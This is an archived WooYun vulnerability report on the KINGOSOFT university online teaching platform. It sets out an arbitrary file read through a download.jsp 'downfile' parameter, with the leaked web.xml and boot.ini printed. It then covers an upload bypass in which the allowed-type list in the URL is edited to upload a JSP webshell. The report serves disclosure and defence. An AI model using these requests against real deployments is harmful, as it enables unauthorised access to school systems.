当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045573

漏洞标题:KINGOSOFT高校网络教学平台一系列严重问题

相关厂商:湖南青果软件有限公司

漏洞作者: if、so

提交时间:2013-12-11 10:13

修复时间:2014-03-08 10:14

公开时间:2014-03-08 10:14

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-11: 细节已通知厂商并且等待厂商处理中
2013-12-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-02-09: 细节向核心白帽子及相关领域专家公开
2014-02-19: 细节向普通白帽子公开
2014-03-01: 细节向实习白帽子公开
2014-03-08: 细节向公众公开

简要描述:

KINGOSOFT高校网络教学平台一系列严重问题

详细说明:

KINGOSOFT高校网络教学平台是青果软件的另一产品,发现有严重的安全隐患。
1.文件读取漏洞
这个系统是J2EE开发,我们来访问(实际测试地址不方便放出,因为是学校)

http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml


得到

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.5"
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee   http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd">
    <!-- 
	<filter>
		<filter-name>CASFilter</filter-name>
		<filter-class>
			edu.yale.its.tp.cas.client.filter.CASFilter
		</filter-class>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.loginUrl
			</param-name>
			<param-value>
				http://192.168.0.186:8081/cas/login
			</param-value>
		</init-param>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.validateUrl
			</param-name>
			<param-value>
				https://192.168.0.186:8081/cas/proxyValidate
			</param-value>
		</init-param>
		<init-param>
			<param-name>
				edu.yale.its.tp.cas.client.filter.serverName
			</param-name>
			<param-value>192.168.0.186:8081</param-value>
		</init-param>
	</filter>
	<filter-mapping>
		<filter-name>CASFilter</filter-name>
		<url-pattern>/caslogin.jsp</url-pattern>
	</filter-mapping>
 -->
	<filter>
		<filter-name>LoginCheckFilter</filter-name>
		<filter-class>
			com.kingosoft.servlet.wljxpt.ptgl.LoginCheckFilter
		</filter-class>
	</filter>
	<filter-mapping>
		<filter-name>LoginCheckFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<servlet>
		<servlet-name>dwr-invoker</servlet-name>
		<servlet-class>
			org.directwebremoting.servlet.DwrServlet
		</servlet-class>
		<init-param>
			<param-name>activeReverseAjaxEnabled</param-name>
			<param-value>true</param-value>
		</init-param>
		<init-param>
			<param-name>debug</param-name>
			<param-value>true</param-value>
		</init-param>
	</servlet>
	
   <listener> 
      <listener-class>com.kingosoft.servlet.wljxpt.ptgl.MySessionListener</listener-class>
      </listener>
	
	<jsp-config>
		<taglib>
			<taglib-uri>http://kingosoft.com/tld/ui</taglib-uri>
			<taglib-location>
				/WEB-INF/tld/kingosoft-ui.tld
			</taglib-location>
		</taglib>
	</jsp-config>
	
 ..........以下省略


试试c:\boot.ini,

http://test.com/testpath/download.jsp?downfile=c:boot.ini


[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003 Enterprise x64 Edition" /noexecute=optout /fastdetect


2.文件上传,需拥有学生账号登陆

QQ截图20131211021233.jpg


如图,我们用我们的学号登陆进来,(虽然我已毕业一年,但是母校还是对我恋恋不舍),找到课外交流-收发邮件,然后我们新建邮件,看到有一个添加附件,我们来试试上传,

QQ截图20131211021715.jpg

,上面限定了文件类型,我尝试了直接上传,果然不行,然后我打开burpsuite抓包,如图

QQ截图20131211022148.jpg


发现在上传提交时,程序把文件类型当做参数一起提交了,

POST /wljxpt/upload.jsp?limitformat=txt,pdf,gif,jpg,rar,doc,bmp,xls,ppt,mp3&maxfilesize=10485760&dir= HTTP/1.1

果断添加一个jsp,成功上传,上传后的shell url为:http;//test.com/uploadfile/server.jsp,

QQ截图20131211022854.jpg

漏洞证明:

QQ截图20131211023146.jpg


QQ截图20131211022854.jpg

修复方案:

你们更专业

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-08 10:14

厂商回复:

最新状态:

2013-12-23:由于邮件系统故障此问题意外忽略,目前正在修复。